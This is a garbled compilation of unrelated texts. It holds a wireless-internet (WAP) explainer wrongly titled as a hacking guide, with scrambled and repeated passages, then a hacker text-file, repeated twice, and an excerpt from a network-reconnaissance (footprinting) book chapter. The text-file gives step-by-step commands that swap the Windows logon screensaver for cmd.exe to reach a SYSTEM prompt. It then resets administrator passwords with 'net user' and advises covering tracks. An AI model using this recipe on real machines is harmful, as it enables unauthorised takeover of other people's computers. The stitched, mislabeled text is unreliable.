• WTP - The Wireless Transaction Protocol acts like a traffic cop, keeping the data flowing in a logical and smooth manner. It also determines how to classify each transaction request:
􀂃 Reliable two-way
􀂃 Reliable one-way
􀂃 Unreliable one-way
The WSP and WTP layers correspond to Hypertext Transfer Protocol (HTTP) in the TCP/IP protocol suite.
• WTLS - Wireless Transport Layer Security provides many of the same security features found in the Transport Layer Security (TLS) part of TCP/IP. It checks data integrity, provides encryption and performs client and server authentication.
• WDP - The Wireless Datagram Protocol works in conjunction with the network carrier layer (see below). WDP makes it easy to adapt WAP to a variety of bearers because all that needs to change is the information maintained at this level.
• Network carriers - Also called bearers, these can be any of the existing technologies that wireless providers use, as long as information is provided at the WDP level to interface WAP with the bearer.
Once the information is received by the WAP client, it is passed to the minibrowser. This is a tiny application built into the wireless device that provides the interface between the user and the wireless Internet. Here's a look at the start page of a typical minibrowser: The minibrowser offers streamlined functionality.
The minibrowser does not offer anything more than basic navigation. Wireless Internet is still a long way from being a true alternative to the normal Internet. It is really positioned right now for people
the specifications of the WAP standard to ensure that it evolves in a timely and useful manner.
HOW TO HACK WIRELESS INTERNET NETWORKS
by Jeff Tyson
You and millions of other people around -- to communicate with
others, follow the stoc
the world use the Internet every day k market, keep up with the news, check the weather, shop, entertain yourself and learn. Staying connected has become to get away from your computer
make travel plans,
conduct business, so important
that it's hard and your Internet connection because you might miss
an e-mail message, an update on your stock or some news you need to knowl life growing more dependent on electronic communication overy to take the next step and get a device that allows you to access the
. With your business or
your persona the Internet, you might
be read Internet on the go.
A cell phone with wireless Internet
That's where wireless Internet comes in. You've probably seen news or advertising about cell phones and PDAs that let you receive and send e-mail. This seems a logical next step, but there are some questions that come up when you think about going mobile with the Internet. Will you still beable to surf the Web? How fast will you be able to get the information you need? You might have heard of the Wireless Application Protocol (WAP) and wonder how it works. In this edition of HowStuffWorks, you will learn just what WAP is, why it is needed and what devices use it.
The Cellular Explosion
Probably the most important factor in the birth of wireless Internet has been the proliferation of digital
cell phones in the last few years. The expanding network of digital cellular and personal
communication services (PCS) has created a solid foundation for wireless Internet services. It is
estimated that there are more than 50 million Web-enabled cell phones in use. In 1997, Nokia,
Motorola, Ericsson and Phone.com came together to create the WAP because they believed that a
universal standard is critical to the successful implementation of wireless Internet. Since then, more
than 350 companies have joined them in the WAP Forum.
A typical digital cell phone
Making a Web site accessible through a wireless device is quite a challenge. So far, only a small portion of the more than a billion Web sites provide any wireless Internet content. As the use of WAP-enabled devices grows, you can expect that many more Web sites will be interested in creating wireless content.
WAP is designed to work on any of the existing wireless services, using standards such as:
• Short Message Service (SMS)
• High-Speed Circuit-Switched Data (CSD)
• General Packet Radio Service (GPRS)
• Unstructured Supplementary Services Data (USSD)
For more information on these services, check out this page.
Wireless Markup Language WAP uses Wireless Markup Language (WML), which includes the Handheld Device Markup Language (HDML) developed by Phone.com.
WML can also trace its roots to eXtensible Markup Language (XML). A markup language is a way of adding information to your content that tells the device receiving the content what to do with it. The best known markup language is Hypertext Markup Language (HTML). Unlike HTML, WML is considered a meta language. Basically, this means that in addition to providing predefined tags, WML lets you design your own markup language components. WAP also allows the use of standard Internet protocols such as UDP, IP and XML.
There are three main reasons why wireless Internet needs the Wireless Application Protocol:
• Transfer speed
• Size and readability
• Navigation
Most cell phones and Web-enabled PDAs have data transfer rates of 14.4 Kbps or less. Compare this to a typical 56 Kbps modem, a cable modem or a DSL connection. Most Web pages today are full of graphics that would take an unbearably long time to download at 14.4 Kbps. Wireless Internet content is typically text-based in order to solve this problem. The main Amazon page for regular Internet The main Amazon page for wireless Internet
The relatively small size of the LCD on a cell phone or PDA presents another challenge. Most Web pages are designed for a resolution of 640x480 pixels, which is fine if you are reading on a desktop or a laptop. The page simply does not fit on a wireless device's display, which might be 150x150 pixels. Also, the majority of wireless devices use monochrome screens. Pages are harder to read when font and background colors become similar shades of gray.
Navigation is another issue. You make your way through a Web page with points and clicks using a mouse; but if you are using a wireless device, you often use one hand to scroll keys.
WAP takes each of these limitations into account and provides a way to work with a typical wireless device.
Wireless Application Protocol Here's what happens when you access a Web site using a WAP-enabled device:
• You turn on the device and open the minibrowser.
• The device sends out a radio signal, searching for service.
• A connection is made with your service provider.
• You select a Web site that you wish to view.
• A request is sent to a gateway server using WAP.
• The gateway server retrieves the information via HTTP from the Web site.
• The gateway server encodes the HTTP data as WML.
• The WML-encoded data is sent to your device.
• You see the wireless Internet version of the Web page you selected.
To create wireless Internet content, a Web site creates special text-only or low-graphics versions of the site. The data is sent in HTTP form by a Web server to a WAP gateway. This system includes the WAP encoder, script compiler and protocol adapters to convert the HTTP information to WML. The gateway then sends the converted data to the WAP client on your wireless device.
What happens between the gateway and the client relies on features of different parts of the WAP protocol stack. Let's take a look at each part of the stack: WAP protocol stack
• WAE - The Wireless Application Environment holds the tools that wireless Internet content developers use. These include WML and WMLScript, which is a scripting language used in conjunction with WML. It functions much like Javascript.
• WSP - The Wireless Session Protocol determines whether a session between the device and the network will be connection-oriented or connectionless. What this is basically talking about is whether or not the device needs to talk back and forth with the network during a session. In a connection-oriented session, data is passed both ways between the device and the network; WSP then sends the packet to the Wireless Transaction Protocol layer (see below). If the session is connectionless, commonly used when information is being broadcast or streamed from the network to the device, then WSP redirects the packet to the Wireless Datagram Protocol layer (see below).
• WTP - The Wireless Transaction Protocol acts like a traffic cop, keeping the data flowing in a logical and smooth manner. It also determines how to classify each transaction request:
􀂃 Reliable two-way
􀂃 Reliable one-way
􀂃 Unreliable one-way
The WSP and WTP layers correspond to Hypertext Transfer Protocol (HTTP) in the TCP/IP protocol suite.
• WTLS - Wireless Transport Layer Security provides many of the same security features found in the Transport Layer Security (TLS) part of TCP/IP. It checks data integrity, provides encryption and performs client and server authentication.
• WDP - The Wireless Datagram Protocol works in conjunction with the network carrier layer (see below). WDP makes it easy to adapt WAP to a variety of bearers because all that needs to change is the information maintained at this level.
• Network carriers - Also called bearers, these can be any of the existing technologies that wireless providers use, as long as information is provided at the WDP level to interface WAP with the bearer.
Once the information is received by the WAP client, it is passed to the minibrowser. This is a tiny application built into the wireless device that provides the interface between the user and the wireless Internet. Here's a look at the start page of a typical minibrowser: The minibrowser offers streamlined functionality.
The minibrowser does not offer anything more than basic navigation. Wireless Internet is still a long way from being a true alternative to the normal Internet. It is really positioned right now for people
the specifications of the WAP standard to ensure that it evolves in a timely and useful manner.
You and millions of other people around -- to communicate with
others, follow the stoc
the world use the Internet every day k market, keep up with the news, check the weather, shop, entertain yourself and learn. Staying connected has become to get away from your computer
make travel plans,
conduct business, so important
that it's hard and your Internet connection because you might miss
an e-mail message, an update on your stock or some news you need to knowl life growing more dependent on electronic communication overy to take the next step and get a device that allows you to access the
. With your business or
your persona the Internet, you might
be read Internet on the go.
A cell phone with wireless Internet
That's where wireless Internet comes in. You've probably seen news or advertising about cell phones and PDAs that let you receive and send e-mail. This seems a logical next step, but there are some questions that come up when you think about going mobile with the Internet. Will you still beable to surf the Web? How fast will you be able to get the information you need? You might have heard of the Wireless Application Protocol (WAP) and wonder how it works. In this edition of HowStuffWorks, you will learn just what WAP is, why it is needed and what devices use it.
The Cellular Explosion
Probably the most important factor in the birth of wireless Internet has been the proliferation of digital
cell phones in the last few years. The expanding network of digital cellular and personal
communication services (PCS) has created a solid foundation for wireless Internet services. It is
estimated that there are more than 50 million Web-enabled cell phones in use. In 1997, Nokia,
Motorola, Ericsson and Phone.com came together to create the WAP because they believed that a
universal standard is critical to the successful implementation of wireless Internet. Since then, more
than 350 companies have joined them in the WAP Forum.
A typical digital cell phone
Making a Web site accessible through a wireless device is quite a challenge. So far, only a small portion of the more than a billion Web sites provide any wireless Internet content. As the use of WAP-enabled devices grows, you can expect that many more Web sites will be interested in creating wireless content.
WAP is designed to work on any of the existing wireless services, using standards such as:
• Short Message Service (SMS)
• High-Speed Circuit-Switched Data (CSD)
• General Packet Radio Service (GPRS)
• Unstructured Supplementary Services Data (USSD)
For more information on these services, check out this page.
Wireless Markup Language WAP uses Wireless Markup Language (WML), which includes the Handheld Device Markup Language (HDML) developed by Phone.com.
WML can also trace its roots to eXtensible Markup Language (XML). A markup language is a way of adding information to your content that tells the device receiving the content what to do with it. The best known markup language is Hypertext Markup Language (HTML). Unlike HTML, WML is considered a meta language. Basically, this means that in addition to providing predefined tags, WML lets you design your own markup language components. WAP also allows the use of standard Internet protocols such as UDP, IP and XML.
There are three main reasons why wireless Internet needs the Wireless Application Protocol:
• Transfer speed
• Size and readability
• Navigation
Most cell phones and Web-enabled PDAs have data transfer rates of 14.4 Kbps or less. Compare this to a typical 56 Kbps modem, a cable modem or a DSL connection. Most Web pages today are full of graphics that would take an unbearably long time to download at 14.4 Kbps. Wireless Internet content is typically text-based in order to solve this problem. The main Amazon page for regular Internet The main Amazon page for wireless Internet
The relatively small size of the LCD on a cell phone or PDA presents another challenge. Most Web pages are designed for a resolution of 640x480 pixels, which is fine if you are reading on a desktop or a laptop. The page simply does not fit on a wireless device's display, which might be 150x150 pixels. Also, the majority of wireless devices use monochrome screens. Pages are harder to read when font and background colors become similar shades of gray.
Navigation is another issue. You make your way through a Web page with points and clicks using a mouse; but if you are using a wireless device, you often use one hand to scroll keys.
WAP takes each of these limitations into account and provides a way to work with a typical wireless device.
Wireless Application Protocol Here's what happens when you access a Web site using a WAP-enabled device:
• You turn on the device and open the minibrowser.
• The device sends out a radio signal, searching for service.
• A connection is made with your service provider.
• You select a Web site that you wish to view.
• A request is sent to a gateway server using WAP.
• The gateway server retrieves the information via HTTP from the Web site.
• The gateway server encodes the HTTP data as WML.
• The WML-encoded data is sent to your device.
• You see the wireless Internet version of the Web page you selected.
To create wireless Internet content, a Web site creates special text-only or low-graphics versions of the site. The data is sent in HTTP form by a Web server to a WAP gateway. This system includes the WAP encoder, script compiler and protocol adapters to convert the HTTP information to WML. The gateway then sends the converted data to the WAP client on your wireless device.
What happens between the gateway and the client relies on features of different parts of the WAP protocol stack. Let's take a look at each part of the stack: WAP protocol stack
• WAE - The Wireless Application Environment holds the tools that wireless Internet content developers use. These include WML and WMLScript, which is a scripting language used in conjunction with WML. It functions much like Javascript.
• WSP - The Wireless Session Protocol determines whether a session between the device and the network will be connection-oriented or connectionless. What this is basically talking about is whether or not the device needs to talk back and forth with the network during a session. In a connection-oriented session, data is passed both ways between the device and the network; WSP then sends the packet to the Wireless Transaction Protocol layer (see below). If the session is connectionless, commonly used when information is being broadcast or streamed from the network to the device, then WSP redirects the packet to the Wireless Datagram Protocol layer (see below).
• WTP - The Wireless Transaction Protocol acts like a traffic cop, keeping the data flowing in a logical and smooth manner. It also determines how to classify each transaction request:
􀂃 Reliable two-way
􀂃 Reliable one-way
􀂃 Unreliable one-way
The WSP and WTP layers correspond to Hypertext Transfer Protocol (HTTP) in the TCP/IP protocol suite.
• WTLS - Wireless Transport Layer Security provides many of the same security features found in the Transport Layer Security (TLS) part of TCP/IP. It checks data integrity, provides encryption and performs client and server authentication.
• WDP - The Wireless Datagram Protocol works in conjunction with the network carrier layer (see below). WDP makes it easy to adapt WAP to a variety of bearers because all that needs to change is the information maintained at this level.
• Network carriers - Also called bearers, these can be any of the existing technologies that wireless providers use, as long as information is provided at the WDP level to interface WAP with the bearer.
Once the information is received by the WAP client, it is passed to the minibrowser. This is a tiny application built into the wireless device that provides the interface between the user and the wireless Internet. Here's a look at the start page of a typical minibrowser: The minibrowser offers streamlined functionality.
The minibrowser does not offer anything more than basic navigation. Wireless Internet is still a long way from being a true alternative to the normal Internet. It is really positioned right now for people
the specifications of the WAP standard to ensure that it evolves in a timely and useful manner.
How to hack Windows XP Admin Passwords the easy way
How to hack Windows XP Admin Passwords the easy way by Estyle, Jaoibh and Azrael.
------------------------------------------------------------------------------
This hack will only work if the person that owns the machine has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time your asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in Windows XP that you can password the default Administrator Diagnostic Account. This means that to by pass most administrators accounts on Windows XP all you have to do is boot to safe mode by pressing F8 during boot up and choosing it. Log into the Administrator Account and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the Administrator Account.
This has worked for me on both Windows XP Home and Pro.
-----------------------------------------------------------------------------
Now this one seems to be machine dependant, it works randomly(don't know why)
If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:
(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work on the welcome screen of a normal booted machine)
-----------------------------------------------------------------------------
cd\ *drops to root cd\windows\system32 *directs to the system32 dir mkdir temphack *creates the folder temphack copy logon.scr temphack\logon.scr *backsup logon.scr copy cmd.exe temphack\cmd.exe *backsup cmd.exe del logon.scr *deletes original logon.scr rename cmd.exe logon.scr *renames cmd.exe to logon.scr exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Any updates, Errors, Suggestions or just general comments mail them to either
Estyle89@hotmail.com jaoibh@hotmail.com
Admin Access in a locked Environment.
This is straight for a brain child. It makes so much sense that no one ever thought to do it. Enjoy. Also beware to change what you have done. Or any machine that you did the hack on will show what you did when the screen saver comes up. The only hard part is finding your way to C:\prompt or ms-dos. So begin.
If you can log in as an account , drop to DOS start -> run -> cmd, at the C: prompt type the following (assuming default install locations)
C:\> cd \winnt\system32 C:\winnt\system32> copy logon.scr logon.scr.old C:\winnt\system32> del logon.scr C:\winnt\system32> copy cmd.exe logon.scr
Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to C:\> net user administrator and then log in with the new account.
Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.
------------------------------------------------------------------------------
This hack will only work if the person that owns the machine has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time your asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in Windows XP that you can password the default Administrator Diagnostic Account. This means that to by pass most administrators accounts on Windows XP all you have to do is boot to safe mode by pressing F8 during boot up and choosing it. Log into the Administrator Account and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the Administrator Account.
This has worked for me on both Windows XP Home and Pro.
-----------------------------------------------------------------------------
Now this one seems to be machine dependant, it works randomly(don't know why)
If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:
(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work on the welcome screen of a normal booted machine)
-----------------------------------------------------------------------------
cd\ *drops to root cd\windows\system32 *directs to the system32 dir mkdir temphack *creates the folder temphack copy logon.scr temphack\logon.scr *backsup logon.scr copy cmd.exe temphack\cmd.exe *backsup cmd.exe del logon.scr *deletes original logon.scr rename cmd.exe logon.scr *renames cmd.exe to logon.scr exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Any updates, Errors, Suggestions or just general comments mail them to either
Estyle89@hotmail.com jaoibh@hotmail.com
Admin Access in a locked Environment.
This is straight for a brain child. It makes so much sense that no one ever thought to do it. Enjoy. Also beware to change what you have done. Or any machine that you did the hack on will show what you did when the screen saver comes up. The only hard part is finding your way to C:\prompt or ms-dos. So begin.
If you can log in as an account , drop to DOS start -> run -> cmd, at the C: prompt type the following (assuming default install locations)
C:\> cd \winnt\system32 C:\winnt\system32> copy logon.scr logon.scr.old C:\winnt\system32> del logon.scr C:\winnt\system32> copy cmd.exe logon.scr
Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to C:\> net user administrator
Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.
NETWORK SECURITY EXPOSED!!!!!(SOLUTIONS)
CHAPTER 1
Footprinting
3
Before the real fun for the hacker begins, three essential steps must be performed.
This chapter will discuss the first one—footprinting—the fine art of gathering target
information. For example, when thieves decide to rob a bank, they don’t just walk
in and start demanding money (not the smart ones, anyway). Instead, they take great
pains in gathering information about the bank—the armored car routes and delivery
times, the video cameras, and the number of tellers, escape exits, and anything else that
will help in a successful misadventure.
The same requirement applies to successful attackers. They must harvest a wealth of
information to execute a focused and surgical attack (one that won’t be readily caught).
As a result, attackers will gather as much information as possible about all aspects of an
organization’s security posture. Hackers end up with a unique footprint or profile of their
Internet, remote access, and intranet/extranet presence. By following a structured methodology,
attackers can systematically glean information from a multitude of sources to
compile this critical footprint on any organization.
WHAT IS FOOTPRINTING?
The systematic footprinting of an organization enables attackers to create a complete profile
of an organization’s security posture. By using a combination of tools and techniques,
attackers can take an unknown quantity (Widget Company’s Internet connection) and reduce
it to a specific range of domain names, network blocks, and individual IP addresses
of systems directly connected to the Internet. While there are many types of footprinting
techniques, they are primarily aimed at discovering information related to the following
environments: Internet, intranet, remote access, and extranet. Table 1-1 depicts these environments
and the critical information an attacker will try to identify.
Why Is Footprinting Necessary?
Footprinting is necessary to systematically and methodically ensure that all pieces of information
related to the aforementioned technologies are identified. Without a sound
methodology for performing this type of reconnaissance, you are likely to miss key pieces
of information related to a specific technology or organization. Footprinting is often the
most arduous task of trying to determine the security posture of an entity; however, it is
one of the most important. Footprinting must be performed accurately and in a controlled
fashion.
INTERNET FOOTPRINTING
While many footprinting techniques are similar across technologies (Internet and
intranet), this chapter will focus on footprinting an organization’s Internet connection(s).
Remote access will be covered in detail in Chapter 9.
4 Hacking Exposed: Network Security Secrets and Solutions
It is difficult to provide a step-by-step guide on footprinting because it is an activity
that may lead you down several paths. However, this chapter delineates basic steps that
should allow you to complete a thorough footprint analysis. Many of these techniques
can be applied to the other technologies mentioned earlier.
Chapter 1: Footprinting 5
Technology Identifies
Internet Domain name
Network blocks
Specific IP addresses of systems reachable via the Internet
TCP and UDP services running on each system identified
System architecture (for example, SPARC vs. X86)
Access control mechanisms and related access control lists (ACLs)
Intrusion detection systems (IDSes)
System enumeration (user and group names, system banners,
routing tables, SNMP information)
Intranet Networking protocols in use (for example, IP, IPX, DecNET,
and so on)
Internal domain names
Network blocks
Specific IP addresses of systems reachable via intranet
TCP and UDP services running on each system identified
System architecture (for example, SPARC vs. X86)
Access control mechanisms and related access control lists (ACLs)
Intrusion detection systems
System enumeration (user and group names, system banners,
routing tables, SNMP information)
Remote
access
Analog/digital telephone numbers
Remote system type
Authentication mechanisms
VPNs and related protocols (IPSEC, PPTP)
Extranet Connection origination and destination
Type of connection
Access control mechanism
Table 1-1. Environments and the Critical Information Attackers Can Identify
6 Hacking Exposed: Network Security Secrets and Solutions
Step 1. Determine the Scope of Your Activities
The first item to address is to determine the scope of your footprinting activities. Are you
going to footprint an entire organization, or are you going to limit your activities to certain
locations (for example, corporate vs. subsidiaries)? In some cases, it may be a daunting
task to determine all the entities associated with a target organization. Luckily, the
Internet provides a vast pool of resources you can use to help narrow the scope of activities
and also provides some insight as to the types and amount of information publicly
available about your organization and its employees.
MOpen Source Search
Popularity: 9
Simplicity: 9
Impact: 2
Risk Rating: 7
As a starting point, peruse the target organization’s web page if they have one. Many
times an organization’s web page provides a ridiculous amount of information that can
aid attackers. We have actually seen organizations list security configuration options for
their firewall system directly on their Internet web server. Other items of interest include
t Locations
n Related companies or entities
n Merger or acquisition news
n Phone numbers
n Contact names and email addresses
n Privacy or security policies indicating the types of
security mechanisms in place
s Links to other web servers related to the organization
In addition, try reviewing the HTML source code for comments. Many items not
listed for public consumption are buried in HTML comment tags such as “<,” “!,” and
“--.” Viewing the source code offline may be faster than viewing it online, so it is often
beneficial to mirror the entire site for offline viewing. Having a copy of the site locally may
allow you to programmatically search for comments or other items of interest, thusmaking
your footprinting activities more efficient. Wget (http://www.gnu.org/software/
Chapter 1: Footprinting 7
wget/wget.html) for UNIX and Teleport Pro (http://www.tenmax.com/teleport/home
.htm) for Windows are great utilities to mirror entire web sites.
After studying web pages, you can perform open source searches for information relating
to the target organization. News articles, press releases, and so on, may provide additional
clues about the state of the organization and their security posture. Web sites
such as finance.yahoo.com or http://www.companysleuth.com provide a plethora of information.
If you are profiling a company that is mostly Internet based, you may find by
searching for related news stories that they have had numerous security incidents. Using
your web search engine of choice will suffice for this activity. However, there are more
advanced searching tools and criteria you can use to uncover additional information.
The FerretPRO suite of search tools from FerretSoft (http://www.ferretsoft.com) is
one of our favorites. WebFerretPRO enables you to search many different search engines
simultaneously. In addition, other tools in the suite allow you to search IRC, USENET,
email, and file databases looking for clues. Also, if you’re looking for a free solution to
search multiple search engines, check out http://www.dogpile.com.
Searching USENET for postings related to @example.com often reveals useful information.
In one case, we saw a posting from a system administrator’s work account regarding
his new PBX system. He said this switch was new to him, and he didn’t know
how to turn off the default accounts and passwords. We’d hate to guess how many phone
phreaks were salivating over the prospect of making free calls at that organization. Needless
to say, you can gain additional insight into the organization and the technical prowess
of its staff just by reviewing their postings.
Lastly, you can use the advanced searching capabilities of some of the major search
engines like AltaVista or Hotbot. These search engines provide a handy facility that allows
you to search for all sites that have links back to the target organization’s domain. This
may not seem significant at first, but let’s explore the implications. Suppose someone in
an organization decides to put up a rogue web site at home or on the target network’s site.
This web server may not be secure or sanctioned by the organization. So we can begin to
look for potential rogue web sites just by determining which sites actually link to the target
organization’s web server, as shown in Figure 1-1.
You can see that the search returned all sites that link back to http://www.l0pht.com
and that contain the word “hacking.” So you could easily use this search facility to find
sites linked to your target domain.
The last example, depicted in Figure 1-2, allows you to limit your search to a particular
site. In our example, we searched http://www.l0pht.com for all occurrences of
“mudge.” This query could easily be modified to search for other items of interest.
Obviously, these examples don’t cover every conceivable item to search for during
your travels—be creative. Sometimes the most outlandish search yields the most productive
results.
EDGAR Search
For targets that are publicly traded companies, you can consult the Securities and Exchange
Commission (SEC) EDGAR database at http://www.sec.gov, as shown in Figure 1-3.
One of the biggest problems organizations have is managing their Internet connections,
especially when they are actively acquiring or merging with other entities. So it is
important to focus on newly acquired entities. Two of the best SEC publications to review
are the 10-Q and 10-K. The 10-Q is a quick snapshot of what the organization has done
over the last quarter. This update includes the purchase or disposition of other entities.
The 10-K is a yearly update of what the company has done and may not be as timely as the
10-Q. It is a good idea to peruse these documents by searching for “subsidiary” or “subsequent
events.” This may provide you with information on a newly acquired entity. Often
organizations will scramble to connect the acquired entities to their corporate network
with little regard for security. So it is likely that you may be able to find security weaknesses
8 Hacking Exposed: Network Security Secrets and Solutions
Figure 1-1. With the AltaVista search engine, use the link:www.example.com directive to
query all sites with links back to the target domain.
in the acquired entity that would allow you to leapfrog into the parent company. Attackers
are opportunistic and are likely to take advantage of the chaos that normally comes
with combining networks.
With an EDGAR search, keep in mind that you are looking for entity names that are
different from the parent company. This will become critical in subsequent steps when
you perform organizational queries from the various whois databases available (see
“Step 2. Network Enumeration”).
U Countermeasure: Public Database Security
Much of the information discussed earlier must be made publicly available; this is especially
true for publicly traded companies. However, it is important to evaluate and classify
the type of information that is publicly disseminated. The Site Security Handbook (RFC
2196) can be found at http://www.ietf.org/rfc/rfc2196.txt and is a wonderful resource
Chapter 1: Footprinting 9
Figure 1-2. With AltaVista, use the host:example.com directive to query the site for the
specified string (for example, “mudge”).
for many policy-related issues. Finally, remove any unnecessary information from your
web pages that may aid an attacker in gaining access to your network.
Step 2. Network Enumeration
Popularity: 9
Simplicity: 9
Impact: 5
Risk Rating: 8
The first step in the network enumeration process is to identify domain names and
associated networks related to a particular organization. Domain names represent the
10 Hacking Exposed: Network Security Secrets and Solutions
Figure 1-3. The EDGAR database allows you to query public documents, providing important
insight into the breadth of the organization by identifying its associated entities.
company’s presence on the Internet and are the Internet equivalent to your company’s
name, such as “AAAApainting.com” and “moetavern.com.”
To enumerate these domains and begin to discover the networks attached to them,
you must scour the Internet. There are multiple whois databases you can query that will
provide a wealth of information about each entity we are trying to footprint. Before the
end of 1999, Network Solutions had a monopoly as the main registrar for domain names
(com, net, edu, and org) and maintained this information on their whois servers. This
monopoly was dissolved and currently there is a multitude of accredited registrars
(http://www.internic.net/alpha.html). Having new registrars available adds steps in
finding our targets (see “Registrar Query” later in this step). We will need to query the
correct registrar for the information we are looking for.
There are many different mechanisms (see Table 1-2) to query the various whois databases.
Regardless of the mechanism, you should still receive the same information. Users
should consult Table 1-3 for other whois servers when looking for domains other than
com, net, edu, or org. Another valuable resource, especially for finding whois servers outside
of the United States, is http://www.allwhois.com. This is one of the most complete
whois resources on the Internet.
Chapter 1: Footprinting 11
Mechanism Resources Platform
Web interface http://www.networksolutions.com/
http://www.arin.net
Any platform with
a web client
Whois client Whois is supplied with most versions
of UNIX.
Fwhois was created by Chris
Cappuccio
UNIX
WS_Ping ProPack http://www.ipswitch.com/ Windows 95/NT/2000
Sam Spade http://www.samspade.org/ssw Windows 95/NT/2000
Sam Spade Web
Interface
http://www.samspade.org/ Any platform with a
web client
Netscan tools http://www.netscantools.com/
nstpromain.html
Windows 95/NT/2000
Xwhois http://c64.org/~nr/xwhois/ UNIX with X and
GTK+ GUI toolkit
Table 1-2. Whois Searching Techniques and Data Sources
Different information can be gleaned with each query. The following query types
provide the majority of information hackers use to begin their attack:
t Registrar Displays specific registrar information and associated whois servers
n Organizational Displays all information related to a particular organization
n Domain Displays all information related to a particular domain
n Network Displays all information related to a particular network or a single
IP address
s Point of contact (POC) Displays all information related to a specific person,
typically the administrative contact
Registrar Query
With the advent of the shared registry system (that is, multiple registrars), we must consult
the whois.crsnic.net server to obtain a listing of potential domains that match our
target and their associated registrar information. We need to determine the correct registrar
so that we can submit detailed queries to the correct database in subsequent steps.
For our example, we will use “Acme Networks” as our target organization and perform
our query from a UNIX (Red Hat 6.2) command shell. In the version of whois we are using,
the @ option allows you to specify an alternate database. In some BSD-derived
whois clients (for example, OpenBSD or FreeBSD), it is possible to use the –a option to
specify an alternate database. You should man whois for more information on how to submit
whois queries with your whois client.
It is advantageous to use a wildcard when performing this search because it will provide
additional search results. Using a “.” after “acme” will list all occurrences of domains that
begin with “acme” rather than domains that simply match “acme” exactly. In addition,
consult http://www.networksolutions.com/en_US/help/whoishelp.html for additional
information on submitting advanced searches. Many of the hints contained in this document
can help you dial-in your search with much more precision.
12 Hacking Exposed: Network Security Secrets and Solutions
Whois Server Addresses
European IP Address Allocations http://www.ripe.net/
Asia Pacific IP Address Allocations http://whois.apnic.net
U.S. military http://whois.nic.mil
U.S. government http://whois.nic.gov
Table 1-3. Government, Military, and International Sources of Whois Databases
[bash]$ whois "acme."@whois.crsnic.net
[whois.crsnic.net]
Whois Server Version 1.1
Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
ACMETRAVEL.COM
ACMETECH.COM
ACMES.COM
ACMERACE.NET
ACMEINC.COM
ACMECOSMETICS.COM
ACME.ORG
ACME.NET
ACME.COM
ACME-INC.COM
If we are interested in obtaining more information on acme.net, we can continue to
drill down further to determine the correct registrar.
[[bash]$ whois "acme.net"@whois.crsnic.net
Whois Server Version 1.1
Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: ACME.NET
Registrar: NETWORK SOLUTIONS, INC.
Whois Server: whois.networksolutions.com
Referral URL: www.networksolutions.com
Name Server: DNS1.ACME.NET
Name Server: DNS2.ACME.NET
Wecan see that Network Solutions is the registrar for this organization, which is quite
common for any organization on the Internet before adoption of the shared registry system.
For subsequent queries, we must query the respective registrar’s database because
they maintain the detailed information we want.
Organizational Query
Once we have identified a registrar, we can submit an organizational query. This type of
query will search a specific registrar for all instances of the entity name and is broader
Chapter 1: Footprinting 13
14 Hacking Exposed: Network Security Secrets and Solutions
than looking for just a domain name. We must use the keyword “name” and submit the
query to Network Solutions.
[bash]$ whois "name Acme Networks"@whois.networksolutions.com
Acme Networks (NAUTILUS-AZ-DOM) NAUTILUS-NJ.COM
Acme Networks (WINDOWS4-DOM) WINDOWS.NET
Acme Networks (BURNER-DOM) BURNER.COM
Acme Networks (ACME2-DOM) ACME.NET
Acme Networks (RIGHTBABE-DOM) RIGHTBABE.COM
Acme Networks (ARTS2-DOM) ARTS.ORG
Acme Networks (HR-DEVELOPMENT-DOM) HR-DEVELOPMENT.COM
Acme Networks (NTSOURCE-DOM) NTSOURCE.COM
Acme Networks (LOCALNUMBER-DOM) LOCALNUMBER.NET
Acme Networks (LOCALNUMBERS2-DOM) LOCALNUMBERS.NET
Acme Networks (Y2MAN-DOM) Y2MAN.COM
Acme Networks (Y2MAN2-DOM) Y2MAN.NET
Acme Networks for Christ Hospital (CHOSPITAL-DOM) CHOSPITAL.ORG
...
From this, we can see many different domains are associated with Acme Networks.
However, are they real networks associated with those domains, or have they been registered
for future use or to protect a trademark? We need to continue drilling down until
we find a live network.
When you are performing an organizational query for a large organization, there may
be hundreds or thousands of records associated with it. Before spamming became so
popular, it was possible to download the entire com domain from Network Solutions.
Knowing this, Network Solutions whois servers will truncate the results and only display
the first 50 records.
Domain Query
Based on our organizational query, the most likely candidate to start with is the Acme.net
domain since the entity is Acme Networks. (Of course, all real names and references have
been changed.)
[bash]$ whois acme.net@whois.networksolutions.com
[whois.networksolutions.com]
Registrant:
Acme Networks (ACME2-DOM)
11 Town Center Ave.
Einstein, AZ 21098
Domain Name: ACME.NET
Administrative Contact, Technical Contact, Zone Contact:
